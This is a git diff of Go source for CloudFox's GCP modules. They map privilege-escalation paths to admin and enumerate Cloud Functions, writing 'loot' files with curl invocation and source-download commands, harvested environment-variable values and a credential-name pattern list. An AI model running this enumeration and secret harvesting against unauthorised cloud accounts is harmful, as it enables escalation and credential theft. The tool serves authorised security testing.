%d with privesc path", + projectID, totalNodes, adminNodes, nodesWithPrivesc), "foxmapper") +} + +func (m *FoxMapperModule) generateOutput(logger internal.Logger, identifier string) FoxMapperOutput { + var output FoxMapperOutput + + // Main table: principals with admin or path to admin + // Read left to right: Project -> Type -> Principal -> Admin Status -> Privesc Target -> Privesc Admin Level -> Hops + mainHeader := []string{"Project", "Type", "Principal", "Is Admin", "Admin Level", "Privesc To", "Privesc Admin Level", "Hops", "Confidence"} + var mainBody [][]string + + // First add admins + for _, admin := range m.Admins { + adminLevel := admin.AdminLevel + if adminLevel == "" { + adminLevel = "project" + } + mainBody = append(mainBody, []string{ + admin.ProjectID, + admin.MemberType, + admin.Email, + "Yes", + adminLevel, + "-", + "-", + "-", + "-", + }) + } + + // Then add nodes with privesc paths + for _, node := range m.NodesWithPrivesc { + paths := m.FoxMapper.GetPrivescPaths(node.Email) + shortestPath := "-" + privescTo := "-" + privescAdminLevel := "-" + confidence := "-" + if len(paths) > 0 { + bestPath := paths[0] + shortestPath = strconv.Itoa(bestPath.HopCount) + // Get the destination (admin) from the best path + privescTo = bestPath.Destination + // Clean up the display + if strings.HasPrefix(privescTo, "serviceAccount:") { + privescTo = strings.TrimPrefix(privescTo, "serviceAccount:") + } else if strings.HasPrefix(privescTo, "user:") { + privescTo = strings.TrimPrefix(privescTo, "user:") + } + + // Confidence from the best path + confidence = bestPath.Confidence + if confidence == "" { + confidence = "high" + } + + // Format privesc admin level + destNode := m.FoxMapper.GetNode(bestPath.Destination) + switch bestPath.AdminLevel { + case "org": + privescAdminLevel = "Org" + case "folder": + // Try to extract folder from the destination node's IAM bindings + if destNode != nil && len(destNode.IAMBindings) > 0 { + for _, binding := range 
destNode.IAMBindings { + if resource, ok := binding["resource"].(string); ok { + if strings.HasPrefix(resource, "folders/") { + folderID := strings.TrimPrefix(resource, "folders/") + privescAdminLevel = fmt.Sprintf("Folder: %s", folderID) + break + } + } + } + } + if privescAdminLevel == "-" { + privescAdminLevel = "Folder" + } + case "project": + // Try to get the project ID from the destination node or principal + if destNode != nil && destNode.ProjectID != "" { + privescAdminLevel = fmt.Sprintf("Project: %s", destNode.ProjectID) + } else { + destProject := extractProjectFromPrincipal(bestPath.Destination, m.OrgCache) + if destProject != "" { + privescAdminLevel = fmt.Sprintf("Project: %s", destProject) + } else { + privescAdminLevel = "Project" + } + } + default: + if bestPath.AdminLevel != "" { + privescAdminLevel = bestPath.AdminLevel + } + } + } + mainBody = append(mainBody, []string{ + node.ProjectID, + node.MemberType, + node.Email, + "No", + "-", + privescTo, + privescAdminLevel, + shortestPath, + confidence, + }) + } + + output.Table = append(output.Table, internal.TableFile{ + Header: mainHeader, + Body: mainBody, + Name: "foxmapper", + }) + + // Detailed paths loot file with full exploitation steps (paths go to loot only, not table/csv/json) + pathsLootContent := m.generatePathsLootContent(identifier) + output.Loot = append(output.Loot, internal.LootFile{ + Name: "foxmapper-paths", + Contents: pathsLootContent, + }) + + // Loot file with full details + lootContent := m.generateLootContent(identifier) + output.Loot = append(output.Loot, internal.LootFile{ + Name: "foxmapper", + Contents: lootContent, + }) + + return output +} + +func (m *FoxMapperModule) generatePathsLootContent(identifier string) string { + var sb strings.Builder + + sb.WriteString("# FoxMapper Privilege Escalation Paths\n") + sb.WriteString(fmt.Sprintf("# Identifier: %s\n", identifier)) + sb.WriteString(fmt.Sprintf("# Total paths: %d principals with escalation paths\n\n", 
len(m.NodesWithPrivesc)))
+
+	for _, node := range m.NodesWithPrivesc {
+		paths := m.FoxMapper.GetPrivescPaths(node.Email)
+		if len(paths) == 0 {
+			continue
+		}
+
+		sb.WriteString(fmt.Sprintf("================================================================================\n"))
+		sb.WriteString(fmt.Sprintf("SOURCE: %s (%s)\n", node.Email, node.MemberType))
+		sb.WriteString(fmt.Sprintf("Project: %s\n", node.ProjectID))
+		sb.WriteString(fmt.Sprintf("Escalation paths: %d\n", len(paths)))
+		sb.WriteString(fmt.Sprintf("================================================================================\n\n"))
+
+		for pathIdx, path := range paths {
+			scopeStatus := ""
+			if path.ScopeBlocked {
+				scopeStatus = " [SCOPE-BLOCKED]"
+			}
+
+			sb.WriteString(fmt.Sprintf("--- Path %d: %s → %s (%s admin, %d hops)%s ---\n\n",
+				pathIdx+1, path.Source, path.Destination, path.AdminLevel, path.HopCount, scopeStatus))
+
+			// Show the path as a visual chain
+			sb.WriteString(fmt.Sprintf("  %s\n", path.Source))
+			for i, edge := range path.Edges {
+				// Connector between hops. NOTE(review): the original
+				// if/else here emitted the identical string in both
+				// branches, so the i < len(path.Edges)-1 check was dead
+				// code; a single unconditional write is equivalent.
+				// (Line count preserved to keep the hunk header valid.)
+				sb.WriteString("    │\n")
+
+				// Scope warning
+				scopeWarning := ""
+				if edge.ScopeBlocksEscalation {
+					scopeWarning = " ⚠️ BLOCKED BY OAUTH SCOPE"
+				} else if edge.ScopeLimited {
+					scopeWarning = " ⚠️ scope-limited"
+				}
+
+				// The technique/reason
+				sb.WriteString(fmt.Sprintf("    ├── [%d] %s%s\n", i+1, edge.ShortReason, scopeWarning))
+
+				// Resource if available
+				if edge.Resource != "" {
+					sb.WriteString(fmt.Sprintf("    │     Resource: %s\n", edge.Resource))
+				}
+
+				// Full reason/description
+				if edge.Reason != "" && edge.Reason != edge.ShortReason {
+					// Wrap long reasons
+					reason := edge.Reason
+					if len(reason) > 80 {
+						sb.WriteString(fmt.Sprintf("    │     %s\n", reason[:80]))
+						sb.WriteString(fmt.Sprintf("    │     %s\n", reason[80:]))
+					} else {
+						sb.WriteString(fmt.Sprintf("    │     %s\n", reason))
+					}
+				}
+
+				// Show destination after this hop
+				if i < len(path.Edges)-1 {
+					
sb.WriteString(fmt.Sprintf(" │\n")) + sb.WriteString(fmt.Sprintf(" ▼\n")) + sb.WriteString(fmt.Sprintf(" %s\n", edge.Destination)) + } else { + sb.WriteString(fmt.Sprintf(" │\n")) + sb.WriteString(fmt.Sprintf(" └──▶ %s (ADMIN)\n", edge.Destination)) + } + } + sb.WriteString("\n") + } + sb.WriteString("\n") + } + + return sb.String() +} + +func (m *FoxMapperModule) generateLootContent(identifier string) string { + var sb strings.Builder + + sb.WriteString("=== FoxMapper Privilege Escalation Analysis ===\n\n") + sb.WriteString(fmt.Sprintf("Identifier: %s\n", identifier)) + sb.WriteString(fmt.Sprintf("Total Nodes: %d\n", m.Summary["total_nodes"])) + sb.WriteString(fmt.Sprintf("Admin Nodes: %d\n", m.Summary["admin_nodes"])) + sb.WriteString(fmt.Sprintf("Nodes with Privesc: %d\n", m.Summary["nodes_with_privesc"])) + sb.WriteString(fmt.Sprintf("Percent with Privesc: %.1f%%\n\n", m.Summary["percent_with_privesc"])) + + // Admin breakdown + sb.WriteString("=== Admin Breakdown ===\n") + sb.WriteString(fmt.Sprintf(" Organization Admins: %d\n", m.Summary["org_admins"])) + sb.WriteString(fmt.Sprintf(" Folder Admins: %d\n", m.Summary["folder_admins"])) + sb.WriteString(fmt.Sprintf(" Project Admins: %d\n\n", m.Summary["project_admins"])) + + // List admins + sb.WriteString("=== Admin Principals ===\n") + for _, admin := range m.Admins { + adminLevel := admin.AdminLevel + if adminLevel == "" { + adminLevel = "project" + } + sb.WriteString(fmt.Sprintf("ADMIN (%s): %s\n", adminLevel, admin.Email)) + } + sb.WriteString("\n") + + // List privesc paths + sb.WriteString("=== Privilege Escalation Paths ===\n\n") + for _, node := range m.NodesWithPrivesc { + paths := m.FoxMapper.GetPrivescPaths(node.Email) + for _, path := range paths { + sb.WriteString(fmt.Sprintf("PATH TO %s ADMIN FOUND\n", strings.ToUpper(path.AdminLevel))) + sb.WriteString(fmt.Sprintf(" Start: %s\n", path.Source)) + sb.WriteString(fmt.Sprintf(" End: %s\n", path.Destination)) + sb.WriteString(fmt.Sprintf(" Hops: 
%d\n", path.HopCount)) + if path.Confidence != "" && path.Confidence != "high" { + sb.WriteString(fmt.Sprintf(" Confidence: %s\n", path.Confidence)) + } + if path.ScopeBlocked { + sb.WriteString(" WARNING: Path may be blocked by OAuth scopes\n") + } + sb.WriteString(" Path:\n") + for i, edge := range path.Edges { + annotations := "" + if edge.ScopeBlocksEscalation { + annotations = " [BLOCKED BY SCOPE]" + } else if edge.ScopeLimited { + annotations = " [scope-limited]" + } + edgeConf := edge.EffectiveConfidence() + if edgeConf != "high" { + annotations += fmt.Sprintf(" [%s confidence]", edgeConf) + } + sb.WriteString(fmt.Sprintf(" (%d) %s%s\n", i+1, edge.Reason, annotations)) + } + sb.WriteString("\n") + } + } + + return sb.String() +} + +func (m *FoxMapperModule) printSummary(logger internal.Logger, identifier string) { + totalNodes, _ := m.Summary["total_nodes"].(int) + adminNodes, _ := m.Summary["admin_nodes"].(int) + nodesWithPrivesc, _ := m.Summary["nodes_with_privesc"].(int) + + logger.InfoM(fmt.Sprintf("Analysis complete for: %s", identifier), "foxmapper") + logger.InfoM(fmt.Sprintf("Total principals: %d", totalNodes), "foxmapper") + logger.InfoM(fmt.Sprintf("Admin principals: %d", adminNodes), "foxmapper") + logger.InfoM(fmt.Sprintf("Principals with path to admin: %d", nodesWithPrivesc), "foxmapper") + + if nodesWithPrivesc > 0 { + percent, _ := m.Summary["percent_with_privesc"].(float64) + logger.InfoM(fmt.Sprintf("Percent with privesc: %.1f%%", percent), "foxmapper") + } + + // Output file location + outputDir := filepath.Join(m.OutputDirectory, "cloudfox-output", "gcp", m.Account) + logger.InfoM(fmt.Sprintf("Output written to: %s", outputDir), "foxmapper") + logger.InfoM("For detailed paths, see the loot file: foxmapper.txt", "foxmapper") +} + +// ============================================================================ +// FoxMapper Cache for use by other modules +// ============================================================================ + +// 
FoxMapperCache wraps FoxMapperService for use by other modules +type FoxMapperCache struct { + service *foxmapperservice.FoxMapperService + populated bool + identifier string +} + +// NewFoxMapperCache creates a new FoxMapper cache +func NewFoxMapperCache() *FoxMapperCache { + return &FoxMapperCache{ + service: foxmapperservice.New(), + } +} + +// LoadFromOrg loads FoxMapper data for an organization +func (c *FoxMapperCache) LoadFromOrg(orgID string) error { + err := c.service.LoadGraph(orgID, true) + if err != nil { + return err + } + c.populated = true + c.identifier = orgID + return nil +} + +// LoadFromProject loads FoxMapper data for a project +func (c *FoxMapperCache) LoadFromProject(projectID string) error { + err := c.service.LoadGraph(projectID, false) + if err != nil { + return err + } + c.populated = true + c.identifier = projectID + return nil +} + +// LoadFromPath loads FoxMapper data from a custom path +func (c *FoxMapperCache) LoadFromPath(path string) error { + err := c.service.LoadGraphFromPath(path) + if err != nil { + return err + } + c.populated = true + c.identifier = path + return nil +} + +// TryLoad attempts to load FoxMapper data, trying org first then project +func (c *FoxMapperCache) TryLoad(orgID, projectID string) error { + // Try org first + if orgID != "" { + if err := c.LoadFromOrg(orgID); err == nil { + return nil + } + } + // Try project + if projectID != "" { + if err := c.LoadFromProject(projectID); err == nil { + return nil + } + } + return fmt.Errorf("could not load FoxMapper data for org %s or project %s", orgID, projectID) +} + +// IsPopulated returns whether the cache has data +func (c *FoxMapperCache) IsPopulated() bool { + return c.populated +} + +// GetAttackSummary returns attack path summary for a principal +func (c *FoxMapperCache) GetAttackSummary(principal string) string { + if !c.populated { + return "run foxmapper" + } + return c.service.GetAttackSummary(principal) +} + +// DoesPrincipalHavePathToAdmin checks if 
principal can escalate +func (c *FoxMapperCache) DoesPrincipalHavePathToAdmin(principal string) bool { + if !c.populated { + return false + } + return c.service.DoesPrincipalHavePathToAdmin(principal) +} + +// IsPrincipalAdmin checks if principal is admin +func (c *FoxMapperCache) IsPrincipalAdmin(principal string) bool { + if !c.populated { + return false + } + return c.service.IsPrincipalAdmin(principal) +} + +// GetPrivescPaths returns privesc paths for a principal +func (c *FoxMapperCache) GetPrivescPaths(principal string) []foxmapperservice.PrivescPath { + if !c.populated { + return nil + } + return c.service.GetPrivescPaths(principal) +} + +// GetService returns the underlying FoxMapper service +func (c *FoxMapperCache) GetService() *foxmapperservice.FoxMapperService { + return c.service +} + +// ============================================================================ +// Helper to find and load FoxMapper data +// ============================================================================ + +// FindAndLoadFoxMapper attempts to find and load FoxMapper data +// Returns the loaded cache or nil if not found +func FindAndLoadFoxMapper(orgID string, projectIDs []string, logger internal.Logger) *FoxMapperCache { + cache := NewFoxMapperCache() + + // Try org first + if orgID != "" { + if err := cache.LoadFromOrg(orgID); err == nil { + logger.InfoM(fmt.Sprintf("Loaded FoxMapper data for org: %s", orgID), "foxmapper") + return cache + } + } + + // Try each project + for _, projectID := range projectIDs { + if err := cache.LoadFromProject(projectID); err == nil { + logger.InfoM(fmt.Sprintf("Loaded FoxMapper data for project: %s", projectID), "foxmapper") + return cache + } + } + + return nil +} + +// SortNodesByPrivesc sorts nodes by privesc capability for display +func SortNodesByPrivesc(nodes []*foxmapperservice.Node) { + sort.Slice(nodes, func(i, j int) bool { + // Admins first + if nodes[i].IsAdmin && !nodes[j].IsAdmin { + return true + } + if !nodes[i].IsAdmin 
&& nodes[j].IsAdmin { + return false + } + // Then by admin level (org > folder > project) + levelOrder := map[string]int{"org": 0, "folder": 1, "project": 2, "": 3} + if nodes[i].AdminLevel != nodes[j].AdminLevel { + return levelOrder[nodes[i].AdminLevel] < levelOrder[nodes[j].AdminLevel] + } + // Then by email + return nodes[i].Email < nodes[j].Email + }) +} diff --git a/gcp/commands/functions.go b/gcp/commands/functions.go new file mode 100755 index 00000000..dd317818 --- /dev/null +++ b/gcp/commands/functions.go @@ -0,0 +1,622 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/gcp/shared" + + FunctionsService "github.com/BishopFox/cloudfox/gcp/services/functionsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPFunctionsCommand = &cobra.Command{ + Use: globals.GCP_FUNCTIONS_MODULE_NAME, + Aliases: []string{"function", "gcf", "cloud-functions"}, + Short: "Enumerate GCP Cloud Functions with security analysis", + Long: `Enumerate GCP Cloud Functions across projects with security-relevant details. 
+ +Features: +- Lists all Cloud Functions (Gen 2) accessible to the authenticated user +- Shows security configuration (ingress settings, VPC connector, service account) +- Identifies publicly invokable functions (allUsers/allAuthenticatedUsers) +- Shows runtime, trigger type, and trigger configuration +- Counts environment variables and secret references +- Generates gcloud commands for further enumeration and exploitation + +Security Columns: +- Ingress: ALL_TRAFFIC (public), INTERNAL_ONLY, or INTERNAL_AND_GCLB +- Public: Whether allUsers or allAuthenticatedUsers can invoke the function +- ServiceAccount: The identity the function runs as (privilege level) +- VPCConnector: Network connectivity to VPC resources +- Secrets: Count of secret environment variables and volumes + +Resource IAM Columns: +- IAM Binding Role: The IAM role granted ON this function (e.g., roles/cloudfunctions.invoker) +- IAM Binding Principal: The principal (user/SA/group) who has that role on this function + +Attack Surface: +- Public HTTP functions may be directly exploitable +- Functions with default service account may have excessive permissions +- Functions with VPC connectors can access internal resources +- Event triggers reveal integration points (Pub/Sub, Storage, etc.) 
+ +TIP: Run foxmapper first to populate the Attack Paths column with privesc/exfil/lateral movement analysis.`, + Run: runGCPFunctionsCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type FunctionsModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields - per-project for hierarchical output + ProjectFunctions map[string][]FunctionsService.FunctionInfo // projectID -> functions + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper graph data (preferred) + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type FunctionsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o FunctionsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o FunctionsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPFunctionsCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_FUNCTIONS_MODULE_NAME) + if err != nil { + return + } + + module := &FunctionsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectFunctions: make(map[string][]FunctionsService.FunctionInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *FunctionsModule) Execute(ctx context.Context, logger internal.Logger) { + // Try to get FoxMapper cache (preferred - graph-based analysis) + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper graph data for attack path analysis", 
globals.GCP_FUNCTIONS_MODULE_NAME) + } + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_FUNCTIONS_MODULE_NAME, m.processProject) + + // Get all functions for stats + allFunctions := m.getAllFunctions() + if len(allFunctions) == 0 { + logger.InfoM("No Cloud Functions found", globals.GCP_FUNCTIONS_MODULE_NAME) + return + } + + // Count public functions + publicCount := 0 + for _, fn := range allFunctions { + if fn.IsPublic { + publicCount++ + } + } + + if publicCount > 0 { + logger.SuccessM(fmt.Sprintf("Found %d function(s), %d PUBLIC", len(allFunctions), publicCount), globals.GCP_FUNCTIONS_MODULE_NAME) + } else { + logger.SuccessM(fmt.Sprintf("Found %d function(s)", len(allFunctions)), globals.GCP_FUNCTIONS_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// getAllFunctions returns all functions from all projects (for statistics) +func (m *FunctionsModule) getAllFunctions() []FunctionsService.FunctionInfo { + var all []FunctionsService.FunctionInfo + for _, functions := range m.ProjectFunctions { + all = append(all, functions...) 
+ } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *FunctionsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Cloud Functions in project: %s", projectID), globals.GCP_FUNCTIONS_MODULE_NAME) + } + + fs := FunctionsService.New() + functions, err := fs.Functions(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_FUNCTIONS_MODULE_NAME, + fmt.Sprintf("Could not enumerate functions in project %s", projectID)) + return + } + + // Thread-safe store per-project + m.mu.Lock() + m.ProjectFunctions[projectID] = functions + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["functions-commands"] = &internal.LootFile{ + Name: "functions-commands", + Contents: "# GCP Cloud Functions Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap[projectID]["functions-secrets"] = &internal.LootFile{ + Name: "functions-secrets", + Contents: "# Cloud Functions Secret References\n# Generated by CloudFox\n# Secrets used by functions (names only)\n\n", + } + } + + for _, fn := range functions { + m.addFunctionToLoot(projectID, fn) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d function(s) in project %s", len(functions), projectID), globals.GCP_FUNCTIONS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *FunctionsModule) addFunctionToLoot(projectID string, fn FunctionsService.FunctionInfo) { + commandsLoot := m.LootMap[projectID]["functions-commands"] + secretsLoot := m.LootMap[projectID]["functions-secrets"] + + if commandsLoot == nil 
{ + return + } + + // All commands for this function + commandsLoot.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# FUNCTION: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Region: %s\n"+ + "# Runtime: %s, Trigger: %s\n"+ + "# Service Account: %s\n"+ + "# Public: %v, Ingress: %s\n", + fn.Name, + fn.ProjectID, fn.Region, + fn.Runtime, fn.TriggerType, + fn.ServiceAccount, + fn.IsPublic, fn.IngressSettings, + ) + + if fn.TriggerURL != "" { + commandsLoot.Contents += fmt.Sprintf("# URL: %s\n", fn.TriggerURL) + } + + if fn.SourceLocation != "" { + commandsLoot.Contents += fmt.Sprintf("# Source: %s (%s)\n", fn.SourceLocation, fn.SourceType) + } + + commandsLoot.Contents += fmt.Sprintf( + "\n# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe function:\n"+ + "gcloud functions describe %s --region=%s --project=%s --gen2\n"+ + "# Get IAM policy:\n"+ + "gcloud functions get-iam-policy %s --region=%s --project=%s --gen2\n"+ + "# Read logs:\n"+ + "gcloud functions logs read %s --region=%s --project=%s --gen2 --limit=50\n", + fn.Name, fn.Region, fn.ProjectID, + fn.Name, fn.Region, fn.ProjectID, + fn.Name, fn.Region, fn.ProjectID, + ) + + // HTTP invocation commands + commandsLoot.Contents += "\n# === EXPLOIT COMMANDS ===\n\n" + if fn.TriggerType == "HTTP" && fn.TriggerURL != "" { + commandsLoot.Contents += fmt.Sprintf( + "# Invoke (GET):\n"+ + "curl -s '%s'\n"+ + "# Invoke (POST with auth):\n"+ + "curl -s -X POST '%s' \\\n"+ + " -H 'Authorization: Bearer $(gcloud auth print-identity-token)' \\\n"+ + " -H 'Content-Type: application/json' \\\n"+ + " -d '{\"test\": \"data\"}'\n", + fn.TriggerURL, + fn.TriggerURL, + ) + } + + // Source download command + if fn.SourceType == "GCS" && fn.SourceLocation != "" { + commandsLoot.Contents += fmt.Sprintf( + "# Download source:\n"+ + "gsutil cp %s ./function-source-%s.zip\n", + fn.SourceLocation, fn.Name, + ) 
+ } + + commandsLoot.Contents += "\n" + + // Secret references + if (len(fn.SecretEnvVarNames) > 0 || len(fn.SecretVolumeNames) > 0) && secretsLoot != nil { + secretsLoot.Contents += fmt.Sprintf( + "## Function: %s (Project: %s)\n", + fn.Name, fn.ProjectID, + ) + if len(fn.SecretEnvVarNames) > 0 { + secretsLoot.Contents += "## Secret Environment Variables:\n" + for _, secretName := range fn.SecretEnvVarNames { + secretsLoot.Contents += fmt.Sprintf("## - %s\n", secretName) + } + } + if len(fn.SecretVolumeNames) > 0 { + secretsLoot.Contents += "## Secret Volumes:\n" + for _, volName := range fn.SecretVolumeNames { + secretsLoot.Contents += fmt.Sprintf("## - %s\n", volName) + } + } + secretsLoot.Contents += "\n" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *FunctionsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *FunctionsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + // Build hierarchical output data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Build project-level outputs + for projectID, functions := range m.ProjectFunctions { + tables := m.buildTablesForProject(projectID, functions) + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !isEmptyLootFile(loot.Contents) { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = FunctionsOutput{Table: tables, Loot: lootFiles} 
+ } + + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_FUNCTIONS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *FunctionsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allFunctions := m.getAllFunctions() + tables := m.buildTablesForProject("", allFunctions) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !isEmptyLootFile(loot.Contents) { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := FunctionsOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_FUNCTIONS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// isEmptyLootFile checks if a loot file contains only the header +func isEmptyLootFile(contents string) bool { + return strings.HasSuffix(contents, "# WARNING: Only use with proper authorization\n\n") || + strings.HasSuffix(contents, "# Secrets used by functions (names only)\n\n") || + strings.HasSuffix(contents, "# Generated by CloudFox\n\n") +} + +// buildTablesForProject builds all tables for a given project's functions +func (m *FunctionsModule) buildTablesForProject(projectID string, 
functions []FunctionsService.FunctionInfo) []internal.TableFile { + tableFiles := []internal.TableFile{} + + // Main functions table + body := m.functionsToTableBody(functions) + if len(body) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_FUNCTIONS_MODULE_NAME, + Header: m.getTableHeader(), + Body: body, + }) + } + + // Secrets table (env vars and secret refs - matching Cloud Run format) + secretsHeader := []string{ + "Project", "Name", "Region", "Env Var", "Value/Type", "Source", "Sensitive", + } + + var secretsBody [][]string + for _, fn := range functions { + // Add environment variables from EnvVars (has actual values) + for _, env := range fn.EnvVars { + sensitive := isFunctionSensitiveEnvVar(env.Name) + if env.Source == "direct" { + secretsBody = append(secretsBody, []string{ + m.GetProjectName(fn.ProjectID), + fn.Name, + fn.Region, + env.Name, + env.Value, + "EnvVar", + sensitive, + }) + } else { + // Secret Manager reference + secretsBody = append(secretsBody, []string{ + m.GetProjectName(fn.ProjectID), + fn.Name, + fn.Region, + env.Name, + fmt.Sprintf("%s:%s", env.SecretName, env.SecretVersion), + "SecretManager", + "Yes", + }) + } + } + + // Add secret volumes + for _, volName := range fn.SecretVolumeNames { + secretsBody = append(secretsBody, []string{ + m.GetProjectName(fn.ProjectID), + fn.Name, + fn.Region, + volName + " (volume)", + volName, + "SecretManager", + "Yes", + }) + } + } + + if len(secretsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_FUNCTIONS_MODULE_NAME + "-secrets", + Header: secretsHeader, + Body: secretsBody, + }) + } + + return tableFiles +} + +// isFunctionSensitiveEnvVar checks if an environment variable name indicates sensitive data +func isFunctionSensitiveEnvVar(envName string) string { + envNameUpper := strings.ToUpper(envName) + sensitivePatterns := []string{ + "PASSWORD", "PASSWD", "SECRET", "API_KEY", "APIKEY", "API-KEY", + "TOKEN", "ACCESS_TOKEN", 
"AUTH_TOKEN", "BEARER", "CREDENTIAL", + "PRIVATE_KEY", "PRIVATEKEY", "CONNECTION_STRING", "CONN_STR", + "DATABASE_URL", "DB_PASSWORD", "DB_PASS", "MYSQL_PASSWORD", + "POSTGRES_PASSWORD", "REDIS_PASSWORD", "MONGODB_URI", + "AWS_ACCESS_KEY", "AWS_SECRET", "AZURE_KEY", "GCP_KEY", + "ENCRYPTION_KEY", "SIGNING_KEY", "JWT_SECRET", "SESSION_SECRET", + "OAUTH", "CLIENT_SECRET", + } + for _, pattern := range sensitivePatterns { + if strings.Contains(envNameUpper, pattern) { + return "Yes" + } + } + return "No" +} + +// getTableHeader returns the functions table header +func (m *FunctionsModule) getTableHeader() []string { + return []string{ + "Project", + "Name", + "Region", + "Runtime", + "State", + "Trigger", + "URL", + "Ingress", + "Public", + "Service Account", + "SA Attack Paths", + "Default SA", + "VPC Access", + "IAM Binding Role", + "IAM Binding Principal", + } +} + +// functionsToTableBody converts functions to table body rows +func (m *FunctionsModule) functionsToTableBody(functions []FunctionsService.FunctionInfo) [][]string { + var body [][]string + for _, fn := range functions { + // Format trigger info + triggerInfo := fn.TriggerType + if fn.TriggerEventType != "" { + triggerInfo = fmt.Sprintf("%s (%s)", fn.TriggerType, extractFunctionName(fn.TriggerEventType)) + } + + // Format URL + url := "-" + if fn.TriggerURL != "" { + url = fn.TriggerURL + } + + // Format state + state := fn.State + if state == "" { + state = "-" + } + + // Format VPC access (renamed from VPC Connector for consistency with Cloud Run) + vpcAccess := "-" + if fn.VPCConnector != "" { + vpcAccess = extractFunctionName(fn.VPCConnector) + if fn.VPCEgressSettings != "" { + vpcAccess += fmt.Sprintf(" (%s)", strings.TrimPrefix(fn.VPCEgressSettings, "VPC_EGRESS_")) + } + } + + // Format service account + serviceAccount := fn.ServiceAccount + if serviceAccount == "" { + serviceAccount = "-" + } + + // Check if using default service account + defaultSA := "No" + if strings.Contains(serviceAccount, 
